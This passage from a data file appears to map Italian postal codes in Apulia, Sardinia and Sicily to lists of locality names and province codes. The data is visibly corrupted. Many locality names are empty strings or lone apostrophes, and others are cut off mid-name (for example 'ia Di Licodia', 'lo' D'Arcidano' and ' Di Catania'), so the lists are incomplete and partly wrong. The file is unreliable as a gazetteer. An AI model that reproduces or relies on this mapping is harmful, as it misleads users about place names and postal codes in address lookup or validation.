"LE"], ["Guagnano", "LE"], ], "73011": [["Alezio", "LE"]], "73012": [["", "LE"]], "73013": [["Collemeto", "LE"], ["Galatina", "LE"], ["Noha", "LE"], ["Santa Barbara", "LE"]], "73014": [["Gallipoli", "LE"]], "73015": [["", "LE"]], "73016": [["San ", "LE"]], "73017": [["", "LE"], ["", "LE"], ["Sannicola", "LE"], ["Chiesanuova", "LE"]], "73018": [["Squinzano", "LE"]], "73019": [["Trepuzzi", "LE"]], "73020": [ ["Serrano", "LE"], ["Palmariggi", "LE"], ["Melpignano", "LE"], ["", "LE"], ["", "LE"], ["Giurdignano", "LE"], ["", "LE"], ["Botrugno", "LE"], ["", "LE"], ["Cavallino", "LE"], ["", "LE"], ["Martignano", "LE"], ["Nociglia", "LE"], ["Cutrofiano", "LE"], ["Vitigliano", "LE"], ["Cerfignano", "LE"], ["Scorrano", "LE"], ["Castromediano", "LE"], ["Casamassella", "LE"], ["", "LE"], ["Cannole", "LE"], ["Cursi", "LE"], ["", "LE"], ], "73021": [["Calimera", "LE"]], "73022": [["", "LE"]], "73023": [["Merine", "LE"], ["Lizzanello", "LE"]], "73024": [["Maglie", "LE"], ["Morigino", "LE"]], "73025": 
[["Martano", "LE"]], "73026": [ ["", "LE"], ["", "LE"], ["Roca", "LE"], ["", "LE"], ["Borgagne", "LE"], ["Melendugno", "LE"], ], "73027": [["", "LE"], ["Cocumola", "LE"], ["", "LE"]], "73028": [["Otranto", "LE"]], "73029": [ ["Struda'", "LE"], ["Pisignano", "LE"], ["Vanze", "LE"], ["", "LE"], ["Vernole", "LE"], ["Acaia", "LE"], ], "73030": [ ["Tiggiano", "LE"], ["", "LE"], ["Diso", "LE"], ["Giuggianello", "LE"], ["", "LE"], ["Ortelle", "LE"], ["Marittima", "LE"], ["Vignacastrisi", "LE"], ["Sanarica", "LE"], ["Surano", "LE"], ], "73031": [["Alessano", "LE"], ["Montesardo", "LE"]], "73032": [["Castiglione", "LE"], ["Andrano", "LE"]], "73033": [["Corsano", "LE"]], "73034": [["", "LE"], ["", "LE"], ["Arigliano", "LE"]], "73035": [["Miggiano", "LE"]], "73036": [["", "LE"]], "73037": [["Poggiardo", "LE"], ["Vaste", "LE"]], "73038": [["Spongano", "LE"]], "73039": [ ["Tutino", "LE"], ["Depressa", "LE"], ["Sant'Eufemia", "LE"], ["Tricase Porto", "LE"], ["Lucugnano", "LE"], ["", "LE"], ["Tricase", "LE"], ], "73040": [ ["Neviano", "LE"], ["", "LE"], ["", "LE"], ["Aradeo", "LE"], ["", "LE"], ["Alliste", "LE"], ["Felline", "LE"], ["", "LE"], ["", "LE"], ["Specchia", "LE"], ["", "LE"], ["Collepasso", "LE"], ["Melissano", "LE"], ["Supersano", "LE"], ["Leuca", "LE"], ["Salignano", "LE"], ], "73041": [["Magliano", "LE"], ["Carmiano", "LE"]], "73042": [["Casarano", "LE"]], "73043": [["Copertino", "LE"]], "73044": [["Galatone", "LE"]], "73045": [["Leverano", "LE"]], "73046": [["Matino", "LE"]], "73047": [["", "LE"]], "73048": [["Nardo'", "LE"]], "73049": [["Ruffano", "LE"], ["Torrepaduli", "LE"]], "73050": [ ["'", "LE"], ["Ruggiano", "LE"], ["Salve", "LE"], ["", "LE"], ["", "LE"], ["", "LE"], ["Boncore", "LE"], ["", "LE"], ["Secli'", "LE"], ], "73051": [["", "LE"], ["Novoli", "LE"]], "73052": [["Parabita", "LE"]], "73053": [["Patu'", "LE"]], "73054": [["Presicce", "LE"]], "73055": [["Racale", "LE"]], "73056": [["Taurisano", "LE"]], "73057": [["Taviano", "LE"]], "73058": [["Tuglie", "LE"]], "73059": [["Gemini", "LE"], ["Ugento", "LE"]], "73100": [["Frigole", "LE"], ["Lecce", "LE"], ["", "LE"], ["", "LE"]], "74010": [["Statte", "TA"]], "74011": [ ["", "TA"], ["", "TA"], ["", "TA"], ["Castellaneta", "TA"], ], "74012": [["Crispiano", "TA"]], "74013": [["Ginosa", "TA"]], "74014": [["Laterza", "TA"]], "74015": [ ["", "TA"], ["", "TA"], ["", "TA"], ["Carpari", "TA"], ["", "TA"], ], "74016": [["Massafra", "TA"]], "74017": [["Mottola", "TA"], ["", "TA"]], "74018": [["Palagianello", "TA"]], "74019": [["Palagiano", "TA"], ["", "TA"]], "74020": [ ["Monteparano", "TA"], ["", "TA"], ["Leporano", "TA"], ["Torricella", "TA"], ["", "TA"], ["Faggiano", "TA"], ["Montemesola", "TA"], ["Roccaforzata", "TA"], ["Lizzano", "TA"], ["Avetrana", "TA"], ["Maruggio", "TA"], ["Monteiasi", "TA"], ], "74021": [["Carosino", "TA"]], "74022": [["Fragagnano", "TA"]], "74023": [["Grottaglie", "TA"]], "74024": [ ["", "TA"], ["Manduria", "TA"], ["San Pietro In Bevagna", "TA"], ["Specchiarica", "TA"], ], "74025": [["", "TA"]], "74026": [["", "TA"], ["Pulsano", "TA"], ["", "TA"], ["", "TA"]], "74027": [["", "TA"]], "74028": [["Sava", "TA"]], "74100": [["", "TA"], ["Talsano", "TA"], ["San Vito Taranto", "TA"], ["Taranto", "TA"], ["Lama", "TA"]], "74121": [["Taranto", "TA"]], "74122": [["Taranto", "TA"]], "74123": [["Taranto", "TA"]], "08030": [ ["Orroli", "CA"], ["Escolca", "CA"], ["Lixius", "CA"], ["Nurallao", "CA"], ["Serri", "CA"], ["Sadali", "CA"], ["Seulo", "CA"], ["Nuragus", "CA"], ["", "CA"], ["Esterzili", "CA"], ["Gergei", "CA"], ["", "NU"], 
["Atzara", "NU"], ["Austis", "NU"], ["Gadoni", "NU"], ["Belvi", "NU"], ["Teti", "NU"], ["Genoni", "OR"], ], "08033": [["Isili", "CA"]], "08035": [["Nurri", "CA"]], "08043": [["Escalaplano", "CA"]], "09010": [ ["Siliqua", "CA"], ["Forte Village", "CA"], ["Vallermosa", "CA"], ["Villaspeciosa", "CA"], ["Decimoputzu", "CA"], ["", "CA"], ["Pula", "CA"], ["Uta", "CA"], ["", "CA"], ["Buggerru", "SU"], ["Villamassargia", "SU"], ["", "SU"], ["Palmas", "SU"], ["Masainas", "SU"], ["", "SU"], ["Giba", "SU"], ["Rosas", "SU"], ["Musei", "SU"], ["Terraseo", "SU"], ["Matzaccara", "SU"], ["Gonnesa", "SU"], ["Terresoli", "SU"], ["Fluminimaggiore", "SU"], ["", "SU"], ["", "SU"], ["Riomurtas", "SU"], ["Piscinas", "SU"], ["Portoscuso", "SU"], ["Perdaxius", "SU"], ["Villarios", "SU"], ["Villaperuccio", "SU"], ["Paringianu", "SU"], ["Narcao", "SU"], ["Tratalias", "SU"], ["Nuxis", "SU"], ["Santadi", "SU"], ], "09012": [["San Leone", "CA"], ["Capoterra", "CA"], ["", "CA"], ["", "CA"]], "09018": [["", "CA"], ["Sarroch", "CA"]], "09019": [["Teulada", "CA"]], "09020": [ ["Samatzai", "CA"], ["Pimentel", "CA"], ["Ussana", "CA"], ["", "SU"], ["Ussaramanna", "SU"], ["Turri", "SU"], ["Genuri", "SU"], ["Villamar", "SU"], ["Siddi", "SU"], ["Villanovafranca", "SU"], ["Gesturi", "SU"], ["Collinas", "SU"], ["", "SU"], ["Villanovaforru", "SU"], ], "09023": [["Monastir", "CA"]], "09024": [["Villagreca", "CA"], ["Nuraminis", "CA"]], "09026": [["San Sperate", "CA"]], "09028": [["Sestu", "CA"]], "09030": [["Elmas", "CA"], ["Pabillonis", "SU"], ["Sardara", "SU"], ["Montevecchio", "SU"], ["Samassi", "SU"]], "09032": [["Assemini", "CA"], ["Macchiareddu", "CA"]], "09033": [["Decimomannu", "CA"]], "09034": [["Villasor", "CA"]], "09040": [ ["Armungia", "CA"], ["Villasalto", "CA"], ["Maracalagonis", "CA"], ["Senorbi'", "CA"], ["Donori'", "CA"], ["", "CA"], ["Suelli", "CA"], ["Goni", "CA"], ["Selegas", "CA"], ["Gesico", "CA"], ["San Vito", "CA"], ["Silius", "CA"], ["", "CA"], ["Guamaggiore", "CA"], ["Guasila", "CA"], ["", "CA"], ["Arixi", "CA"], ["Barrali", "CA"], ["Mandas", "CA"], ["Soleminis", "CA"], ["Ballao", "CA"], ["Villaputzu", "CA"], ["Burcei", "CA"], ["", "CA"], ["Castiadas", "CA"], ["Serdiana", "CA"], ["Sisini", "CA"], ["", "CA"], ["Ortacesus", "CA"], ["", "CA"], ["Furtei", "SU"], ["Segariu", "SU"], ], "09041": [["Dolianova", "CA"]], "09042": [["Monserrato", "CA"]], "09043": [["Muravera", "CA"]], "09044": [["Quartucciu", "CA"]], "09045": [["", "CA"], ["", "CA"]], "09047": [["Selargius", "CA"], ["Su Planu", "CA"]], "09048": [["Sinnai", "CA"]], "09049": [["Villasimius", "CA"]], "09100": [["Cagliari", "CA"]], "09121": [["Cagliari", "CA"]], "09122": [["Cagliari", "CA"]], "09123": [["Cagliari", "CA"]], "09124": [["Cagliari", "CA"]], "09125": [["Cagliari", "CA"]], "09126": [ ["Cagliari", "CA"], ["", "CA"], ["San Bartolomeo", "CA"], ["Lazzaretto", "CA"], ["Poetto", "CA"], ], "09127": [["Cagliari", "CA"]], "09128": [["Cagliari", "CA"]], "09129": [["Cagliari", "CA"]], "09131": [["Cagliari", "CA"]], "09134": [["Cagliari", "CA"], ["Pirri", "CA"]], "08010": [ ["Lei", "NU"], ["Birori", "NU"], ["Noragugume", "NU"], ["Dualchi", "NU"], ["", "OR"], ["Suni", "OR"], ["Magomadas", "OR"], ["", "OR"], ["Sagama", "OR"], ["Flussio", "OR"], ["Montresta", "OR"], ["Tinnura", "OR"], ], "08011": [["Bolotana", "NU"]], "08012": [["Bortigali", "NU"], ["Mulargia", "NU"]], "08015": [["Macomer", "NU"]], "08016": [["Borore", "NU"]], "08017": [["Silanus", "NU"]], "08018": [["Sindia", "NU"]], "08020": [ ["Onifai", "NU"], ["", "NU"], ["", "NU"], ["Ottana", "NU"], 
["Onani", "NU"], ["", "NU"], ["Ovodda", "NU"], ["Sant'Efisio", "NU"], ["", "NU"], ["Tiana", "NU"], ["", "NU"], ["Olzai", "NU"], ["Orotelli", "NU"], ["Sarule", "NU"], ["Ovedi'", "NU"], ["Orune", "NU"], ["Berchidda", "NU"], ["Lodine", "NU"], ["Galtelli", "NU"], ["Oniferi", "NU"], ["", "NU"], ["", "NU"], ["Concas", "NU"], ["Osidda", "NU"], ["Torpe'", "NU"], ["Ollolai", "NU"], ["Gavoi", "NU"], ["Brunella", "NU"], ["Lode'", "NU"], ["Talava'", "NU"], ["Irgoli", "NU"], ["Mamone", "NU"], ["Lula", "NU"], ["Loculi", "NU"], ["Posada", "NU"], ["Muvruneddi", "SS"], ["S'Iscala", "SS"], ["Straulas", "SS"], ["", "SS"], ["Agrustos", "SS"], ["Luddui", "SS"], ["Tanaunella", "SS"], ["Nuditta", "SS"], ["Birgalavo'", "SS"], ["Budoni", "SS"], ["", "SS"], ["Malamori'", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["Bircolovo'", "SS"], ["Silimini", "SS"], ["Lutturai", "SS"], ["", "SS"], ["Schifoni", "SS"], ["", "SS"], ["Franculacciu", "SS"], ["", "SS"], ["", "SS"], ["Strugas", "SS"], ["", "SS"], ["", "SS"], ["Pattimedda", "SS"], ["Terrapadedda", "SS"], ["Tiridduli", "SS"], ["", "SS"], ["Budditogliu", "SS"], ["", "SS"], ["Lotturai", "SS"], ["", "SS"], ["Su Linalvu", "SS"], ["Rinaggiu", "SS"], ["Suaredda", "SS"], ["Limpostu", "SS"], ["", "SS"], ["Traversa", "SS"], ["Sitagliacciu", "SS"], ["L'Alzoni", "SS"], ["", "SS"], ["Nuragheddu", "SS"], ["Ottiolu", "SS"], ["Muriscuvo'", "SS"], ["San Pietro", "SS"], ["Puntaldia", "SS"], ["", "SS"], ["Maiorca", "SS"], ["Tamarispa", "SS"], ["", "SS"], ["", "SS"], ["San Silvestro", "SS"], ["Solita'", "SS"], ["Badualga", "SS"], ["", "SS"], ["Limpiddu", "SS"], ["Luttuni", "SS"], ["Berruiles", "SS"], ], "08021": [["Bitti", "NU"]], "08022": [["Dorgali", "NU"], ["", "NU"]], "08023": [["Fonni", "NU"]], "08024": [["Mamoiada", "NU"]], "08025": [["Oliena", "NU"], ["Su Cologone", "NU"]], "08026": [["Orani", "NU"]], "08027": [["Orgosolo", "NU"]], "08028": [ ["", "NU"], ["Orosei", "NU"], ["", "NU"], ["", "NU"], ["", "NU"], ], "08029": [ ["Siniscola", "NU"], ["", "NU"], ["Sarenargiu", "NU"], ["'", "NU"], ["", "NU"], ["", "NU"], ["Berchida", "NU"], ["", "NU"], ["Mandras", "NU"], ["", "NU"], ["Overì", "NU"], ["", "NU"], ], "08031": [["Gidilau", "NU"], ["Aritzo", "NU"]], "08032": [["Desulo", "NU"]], "08036": [["Ortueri", "NU"]], "08037": [["Seui", "NU"]], "08038": [["Sorgono", "NU"]], "08039": [["Tonara", "NU"]], "08040": [ ["S'Arridellu", "NU"], ["Girasole", "NU"], ["Arzana", "NU"], ["Urzulei", "NU"], ["Ardali", "NU"], ["Gairo", "NU"], ["Osini", "NU"], ["", "NU"], ["Ussassai", "NU"], ["Tancau", "NU"], ["Baunei", "NU"], ["Loceri", "NU"], ["Ulassai", "NU"], ["", "NU"], ["Lotzorai", "NU"], ["Triei", "NU"], ["Taquisara", "NU"], ["Talana", "NU"], ["Cardedu", "NU"], ["Elini", "NU"], ["Ilbono", "NU"], ["", "NU"], ], "08042": [["", "NU"]], "08044": [["Jerzu", "NU"]], "08045": [["Lanusei", "NU"]], "08046": [["Perdasdefogu", "NU"]], "08047": [["Migheli", "NU"], ["Tertenia", "NU"]], "08048": [ ["", "NU"], ["", "NU"], ["Calamoresca", "NU"], ["Tortoli'", "NU"], ["", "NU"], ["Arbatax", "NU"], ["", "NU"], ], "08049": [["", "NU"], ["", "NU"]], "08100": [["Nuoro", "NU"], ["", "NU"], ["Manasuddas", "NU"], ["Lollove", "NU"]], "08013": [["Turas", "OR"], ["", "OR"], ["Bosa", "OR"]], "08019": [["Modolo", "OR"]], "08034": [["", "OR"], ["Crastu", "OR"], ["", "OR"], ["Traidodini", "OR"], ["Laconi", "OR"]], "09070": [ ["", "OR"], ["Bauladu", "OR"], ["Norbello", "OR"], ["Zeddiani", "OR"], ["", "OR"], ["Siamaggiore", "OR"], ["Seneghe", "OR"], ["", "OR"], ["", "OR"], ["", "OR"], ["", "OR"], ["Bonarcado", "OR"], 
["Zerfaliu", "OR"], ["", "OR"], ["Narbolia", "OR"], ["Mandriola", "OR"], ["Milis", "OR"], ["Nurachi", "OR"], ["Domus", "OR"], ["Paulilatino", "OR"], ["Tramatza", "OR"], ["Aidomaggiore", "OR"], ], "09071": [["Abbasanta", "OR"]], "09072": [["Solanas", "OR"], ["Cabras", "OR"]], "09073": [ ["", "OR"], ["Santa Caterina", "OR"], ["S'Archittu", "OR"], ["Cuglieri", "OR"], ["", "OR"], ], "09074": [["Zuri", "OR"], ["Ghilarza", "OR"]], "09075": [["", "OR"], ["", "OR"]], "09076": [["Sedilo", "OR"]], "09077": [["Solarussa", "OR"]], "09078": [["Sennariolo", "OR"], ["", "OR"]], "09079": [["Tresnuraghes", "OR"]], "09080": [ ["Sorradile", "OR"], ["Soddi'", "OR"], ["Bidoni'", "OR"], ["Senis", "OR"], ["Neoneli", "OR"], ["Siapiccia", "OR"], ["", "OR"], ["", "OR"], ["Boroneddu", "OR"], ["Siamanna", "OR"], ["", "OR"], ["Villaurbana", "OR"], ["", "OR"], ["Mogorella", "OR"], ["Nureci", "OR"], ["Assolo", "OR"], ["Allai", "OR"], ["Asuni", "OR"], ["Tadasuni", "OR"], ], "09081": [["Ardauli", "OR"]], "09082": [["Busachi", "OR"]], "09083": [["Fordongianus", "OR"]], "09084": [["", "OR"]], "09085": [["Ruinas", "OR"]], "09086": [["Samugheo", "OR"]], "09088": [["Ollastra", "OR"], ["Simaxis", "OR"]], "09090": [ ["Gonnoscodina", "OR"], ["", "OR"], ["Baressa", "OR"], ["Morgongiori", "OR"], ["Albagiara", "OR"], ["Sini", "OR"], ["Baradili", "OR"], ["Curcuris", "OR"], ["Masullas", "OR"], ["Pau", "OR"], ["Tiria", "OR"], ["Siris", "OR"], ["Gonnosno'", "OR"], ["Usellus", "OR"], ["Simala", "OR"], ["", "OR"], ], "09091": [["Ales", "OR"]], "09092": [["Arborea", "OR"]], "09093": [["Gonnostramatza", "OR"], ["Pompu", "OR"]], "09094": [["Marrubiu", "OR"], ["Sant'Anna", "OR"]], "09095": [["Mogoro", "OR"]], "09096": [["", "OR"]], "09097": [["lo' D'Arcidano", "OR"]], "09098": [["", "OR"], ["Terralba", "OR"]], "09099": [["Uras", "OR"]], "09170": [ ["Massama", "OR"], ["Oristano", "OR"], ["", "OR"], ["Nuraxinieddu", "OR"], ["Sili'", "OR"], ["", "OR"], ], "07010": [ ["Benetutti", "SS"], ["Bottidda", "SS"], ["'", "SS"], ["Romana", "SS"], ["Nule", "SS"], ["Mara", "SS"], ["Bultei", "SS"], ["Tula", "SS"], ["", "SS"], ["Cossoine", "SS"], ["Giave", "SS"], ["", "SS"], ["Semestene", "SS"], ["Burgos", "SS"], ["Ardara", "SS"], ["Anela", "SS"], ["Illorai", "SS"], ["Esporlatu", "SS"], ["Ittireddu", "SS"], ["", "SS"], ], "07011": [["Bono", "SS"]], "07012": [["Rebeccu", "SS"], ["", "SS"], ["Bonorva", "SS"]], "07013": [["Mores", "SS"]], "07014": [["", "SS"], ["Chilivani", "SS"], ["Ozieri", "SS"], ["Vigne", "SS"], ["Fraigas", "SS"]], "07015": [["Padria", "SS"]], "07016": [["Pattada", "SS"]], "07017": [["Ploaghe", "SS"]], "07018": [["Pozzomaggiore", "SS"]], "07019": [["", "SS"]], "07020": [ ["Budduso'", "SS"], ["", "SS"], ["Vaccileddi", "SS"], ["Padru", "SS"], ["", "SS"], ["", "SS"], ["Monti", "SS"], ["Luogosanto", "SS"], ["", "SS"], ["Telti", "SS"], ["Loiri", "SS"], ["", "SS"], ["Aglientu", "SS"], ["Palau", "SS"], ["Loiri Porto ", "SS"], ["Aggius", "SS"], ], "07021": [ ["Pirazzolu", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["Cannigione", "SS"], ["", "SS"], ["Arzachena", "SS"], ["", "SS"], ], "07022": [["Berchidda", "SS"]], "07023": [["Calangianus", "SS"]], "07024": [["Moneta", "SS"], ["", "SS"], ["La Maddalena", "SS"]], "07025": [["Luras", "SS"]], "07026": [["San Pantaleo", "SS"], ["", "SS"], ["Olbia", "SS"], ["Berchiddeddu", "SS"]], "07027": [["Oschiri", "SS"]], "07028": [["San Pasquale", "SS"], ["", "SS"]], "07029": [["", "SS"], ["Nuchis", "SS"], ["Bassacutena", "SS"]], "07030": [ ["Martis", "SS"], ["Chiaramonti", "SS"], ["Tergu", "SS"], ["", "SS"], 
["Bortigiadas", "SS"], ["Muros", "SS"], ["Florinas", "SS"], ["Badesi", "SS"], ["", "SS"], ["Viddalba", "SS"], ["Erula", "SS"], ["Cargeghe", "SS"], ["Bulzi", "SS"], ["Laerru", "SS"], ], "07031": [["", "SS"], ["Castelsardo", "SS"]], "07032": [["Nulvi", "SS"]], "07033": [["Osilo", "SS"], ["Santa Vittoria", "SS"]], "07034": [["Perfugas", "SS"]], "07035": [["Sedini", "SS"]], "07036": [["Sennori", "SS"]], "07037": [["Platamona", "SS"], ["Sorso", "SS"]], "07038": [["", "SS"], ["'", "SS"]], "07039": [["", "SS"], ["Valledoria", "SS"], ["Codaruina", "SS"]], "07040": [ ["Tissi", "SS"], ["Tottubella", "SS"], ["Campanedda", "SS"], ["Palmadula", "SS"], ["Canaglia", "SS"], ["", "SS"], ["Siligo", "SS"], ["Codrongianos", "SS"], ["Stintino", "SS"], ["Rumanedda", "SS"], ["Olmedo", "SS"], ["La Corte", "SS"], ["Argentiera", "SS"], ["Borutta", "SS"], ["Uri", "SS"], ["Bessude", "SS"], ["Putifigari", "SS"], ["Cheremule", "SS"], ["Biancareddu", "SS"], ["Banari", "SS"], ], "07041": [ ["Alghero", "SS"], ["Santa Maria La Palma", "SS"], ["", "SS"], ["Fertilia", "SS"], ["Tramariglio", "SS"], ], "07043": [["Bonnanaro", "SS"]], "07044": [["Ittiri", "SS"]], "07045": [["Ossi", "SS"]], "07046": [ ["", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ], "07047": [["Thiesi", "SS"]], "07048": [["Torralba", "SS"]], "07049": [["Usini", "SS"]], "07100": [ ["Sassari", "SS"], ["Ottava", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["Bancali", "SS"], ["Macciadosa", "SS"], ], "09011": [["Calasetta", "SU"], ["Cussorgia", "SU"]], "09013": [ ["", "SU"], ["Sirai", "SU"], ["Barbusi", "SU"], ["Carbonia", "SU"], ["Cortoghiana", "SU"], ["Serbariu", "SU"], ], "09014": [["Carloforte", "SU"]], "09015": [["Domusnovas", "SU"]], "09016": [["Nebida", "SU"], ["Iglesias", "SU"], ["", "SU"], ["Bindua", "SU"], ["Monteponi", "SU"]], "09017": [["Sant'Antioco", "SU"]], "09021": [["Barumini", "SU"]], "09022": [["Lunamatrona", "SU"]], "09025": [["", "SU"], ["Sanluri", "SU"]], "09027": [["Serrenti", "SU"]], "09029": [["Tuili", "SU"], ["Setzu", "SU"]], "09031": [["Gennamari", "SU"], ["", "SU"], ["Arbus", "SU"], ["Ingurtosu", "SU"]], "09035": [["Gonnosfanadiga", "SU"]], "09036": [["Guspini", "SU"]], "09037": [["", "SU"]], "09038": [["Serramanna", "SU"]], "09039": [["Villacidro", "SU"]], "92010": [ ["Burgio", "AG"], ["Lampedusa", "AG"], ["Caltabellotta", "AG"], ["Calamonaci", "AG"], ["Realmonte", "AG"], ["", "AG"], ["", "AG"], ["", "AG"], ["Linosa", "AG"], ["", "AG"], ["Montevago", "AG"], ["", "AG"], ["Siculiana", "AG"], ["Sant'Anna", "AG"], ["Montallegro", "AG"], ["Bivona", "AG"], ], "92011": [["", "AG"]], "92012": [["Cianciana", "AG"]], "92013": [["Menfi", "AG"]], "92014": [["", "AG"]], "92015": [["Raffadali", "AG"]], "92016": [["", "AG"], ["Ribera", "AG"]], "92017": [["", "AG"]], "92018": [["", "AG"]], "92019": [["Sciacca", "AG"]], "92020": [ ["", "AG"], ["", "AG"], ["", "AG"], ["", "AG"], ["", "AG"], ["Castrofilippo", "AG"], ["Racalmuto", "AG"], ["Comitini", "AG"], ["Camastra", "AG"], ["Grotte", "AG"], ["", "AG"], ["", "AG"], ], "92021": [["Aragona", "AG"], ["Caldare", "AG"]], "92022": [["", "AG"], ["Cammarata", "AG"]], "92023": [["", "AG"]], "92024": [["Canicatti'", "AG"]], "92025": [["Zolfare", "AG"], ["", "AG"], ["Casteltermini", "AG"]], "92026": [["Favara", "AG"]], "92027": [["Licata", "AG"]], "92028": [["Naro", "AG"]], "92029": [["", "AG"], ["Ravanusa", "AG"]], "92100": [ ["", "AG"], ["'", "AG"], ["Villaseta", "AG"], ["'", "AG"], ["Agrigento", "AG"], ["Montaperto", "AG"], ["", "AG"], ], "93010": [ ["Campofranco", "CL"], ["Sutera", "CL"], ["Bompensiere", "CL"], 
["", "CL"], ["", "CL"], ["Serradifalco", "CL"], ["Milena", "CL"], ["Montedoro", "CL"], ["Villalba", "CL"], ["Marianopoli", "CL"], ["Resuttano", "CL"], ["Delia", "CL"], ], "93011": [["Butera", "CL"]], "93012": [["Gela", "CL"]], "93013": [["Mazzarino", "CL"]], "93014": [["Polizzello", "CL"], ["Mussomeli", "CL"]], "93015": [["Niscemi", "CL"]], "93016": [["Riesi", "CL"]], "93017": [["San Cataldo", "CL"]], "93018": [["Santa Caterina Villarmosa", "CL"]], "93019": [["", "CL"], ["Sommatino", "CL"]], "93100": [ ["Favarella", "CL"], ["", "CL"], ["", "CL"], ["Caltanissetta", "CL"], ], "95010": [ ["", "CT"], ["Milo", "CT"], ["Sant'Alfio", "CT"], ["", "CT"], ["Fornazzo", "CT"], ["Linera", "CT"], ], "95011": [["Pasteria", "CT"], ["Calatabiano", "CT"]], "95012": [ ["Solicchiata", "CT"], ["Passopisciaro", "CT"], ["Mitogio", "CT"], ["Verzella", "CT"], ["", "CT"], ], "95013": [["", "CT"]], "95014": [ ["Trepunti", "CT"], ["Carruba", "CT"], ["", "CT"], ["Giarre", "CT"], ["", "CT"], ["Altarello", "CT"], ["", "CT"], ["", "CT"], ], "95015": [["Linguaglossa", "CT"]], "95016": [ ["Puntalazzo", "CT"], ["Carrabba", "CT"], ["Portosalvo", "CT"], ["", "CT"], ["Nunziata", "CT"], ["Mascali", "CT"], ], "95017": [["Presa", "CT"], ["Vena", "CT"], ["", "CT"]], "95018": [["", "CT"], ["Riposto", "CT"]], "95019": [["", "CT"], ["Fleri", "CT"], ["Sarro", "CT"], ["", "CT"]], "95020": [["", "CT"]], "95021": [["Ficarazzi", "CT"], ["", "CT"], ["Cannizzaro", "CT"], ["", "CT"]], "95022": [ ["Vampolieri", "CT"], ["Nizzeti", "CT"], ["", "CT"], ["", "CT"], ["'", "CT"], ["", "CT"], ], "95024": [ ["", "CT"], ["Acireale", "CT"], ["", "CT"], ["Pozzillo", "CT"], ["Guardia", "CT"], ["Pennisi", "CT"], ["", "CT"], ["Stazzo", "CT"], ["Mangano", "CT"], ["", "CT"], ["Scillichenti", "CT"], ["Santa Maria La Scala", "CT"], ], "95025": [ ["", "CT"], ["Lavina", "CT"], ["", "CT"], ["Santa Maria La Stella", "CT"], ["Monterosso", "CT"], ["Lavinaio", "CT"], ], "95027": [["Cerza", "CT"], ["", "CT"]], "95028": [["Valverde", "CT"]], "95029": [["Viagrande", "CT"]], "95030": [ ["", "CT"], ["Nicolosi", "CT"], ["", "CT"], ["Mascalucia", "CT"], ["Ragalna", "CT"], ["", "CT"], ["Maniace", "CT"], ["Pedara", "CT"], ["Canalicchio", "CT"], ["", "CT"], ], "95031": [["Adrano", "CT"]], "95032": [ ["Belpasso", "CT"], ["", "CT"], ["", "CT"], ["", "CT"], ["", "CT"], ["Palazzolo", "CT"], ], "95033": [["Biancavilla", "CT"]], "95034": [["Bronte", "CT"]], "95035": [["Maletto", "CT"]], "95036": [["Randazzo", "CT"], ["Calderara", "CT"]], "95037": [["San Giovanni La Punta", "CT"], ["Trappeto", "CT"]], "95038": [["ia Di Licodia", "CT"]], "95039": [["Trecastagni", "CT"]], "95040": [ ["", "CT"], ["", "CT"], ["Libertinia", "CT"], ["", "CT"], ["Giumarra", "CT"], ["Mazzarrone", "CT"], ["", "CT"], ["", "CT"], ["Raddusa", "CT"], ["Cinquegrana", "CT"], ["", "CT"], ["", "CT"], ["Ramacca", "CT"], ["Carrubbo", "CT"], ], "95041": [ ["", "CT"], ["Caltagirone", "CT"], ["Granieri", "CT"], ["", "CT"], ], "95042": [["Grammichele", "CT"]], "95043": [[" Di Catania", "CT"]], "95044": [["", "CT"], ["Mineo", "CT"]], "95045": [["Misterbianco", "CT"], ["", "CT"]], "95046": [["Palagonia", "CT"]], "95047": [["Paterno'", "CT"], ["Sferro", "CT"]], "95048": [["Scordia", "CT"]], "95049": [["Vizzini", "CT"]], "95100": [["Catania", "CT"]], "95121": [ ["Catania", "CT"], ["", "CT"], ["San Teodoro", "CT"], ["San Giorgio", "CT"], ["San Giuseppe All", "CT"], ["", "CT"], ["", "CT"], ], "95122": [["Nesima Inferiore", "CT"], ["Acquicella", "CT"], ["Nesima Superiore", "CT"], ["Catania", "CT"]], "95123": [["Catania", "CT"], 
["San Nullo", "CT"], ["Cibali", "CT"]], "95124": [["Catania", "CT"]], "95125": [["Catania", "CT"], ["Canalicchio", "CT"], ["Barriera Del Bosco", "CT"]], "95126": [["Ognina", "CT"], ["Catania", "CT"]], "95127": [["Catania", "CT"], ["Picanello", "CT"]], "95128": [["Catania", "CT"]], "95129": [["Catania", "CT"]], "95131": [["Catania", "CT"]], "94010": [ ["", "EN"], ["Assoro", "EN"], ["Nissoria", "EN"], ["Calascibetta", "EN"], ["Cacchiamo", "EN"], ["", "EN"], ["", "EN"], ["Sperlinga", "EN"], ["Cerami", "EN"], ["Centuripe", "EN"], ["Villarosa", "EN"], ["Catenanuova", "EN"], ["Villapriolo", "EN"], ["Aidone", "EN"], ], "94011": [["Agira", "EN"]], "94012": [["Barrafranca", "EN"]], "94013": [["Leonforte", "EN"]], "94014": [["Nicosia", "EN"], ["Villadoro", "EN"], ["San Giacomo", "EN"]], "94015": [["Grottacalda", "EN"], ["", "EN"]], "94016": [["Pietraperzia", "EN"]], "94017": [["Regalbuto", "EN"]], "94018": [["Troina", "EN"]], "94019": [["", "EN"]], "94100": [["Enna", "EN"], ["Pergusa", "EN"], ["", "EN"]], "98020": [["Rocchenere", "ME"], ["Pagliara", "ME"], ["Mandanici", "ME"], ["Ali'", "ME"], ["Locadi", "ME"]], "98021": [["", "ME"]], "98022": [["Fiumedinisi", "ME"]], "98023": [["", "ME"]], "98025": [["Itala", "ME"], ["", "ME"]], "98026": [["", "ME"]], "98027": [["Sciglio", "ME"], ["Roccalumera", "ME"], ["Allume", "ME"]], "98028": [["Misserio", "ME"], ["", "ME"], ["Barracca", "ME"]], "98029": [ ["", "ME"], ["", "ME"], ["", "ME"], ["Guidomandri", "ME"], ], "98030": [ ["", "ME"], ["Floresta", "ME"], ["", "ME"], ["Gallodoro", "ME"], ["Roccafiorita", "ME"], ["Mongiuffi", "ME"], ["Santa Dia", "ME"], ["'", "ME"], ["", "ME"], ["Limina", "ME"], ["Gaggi", "ME"], ["", "ME"], ["Castelmola", "ME"], ["", "ME"], ["", "ME"], ["Melia", "ME"], ["Antillo", "ME"], ["Malvagna", "ME"], ], "98031": [["Capizzi", "ME"]], "98032": [ ["Misitano", "ME"], ["", 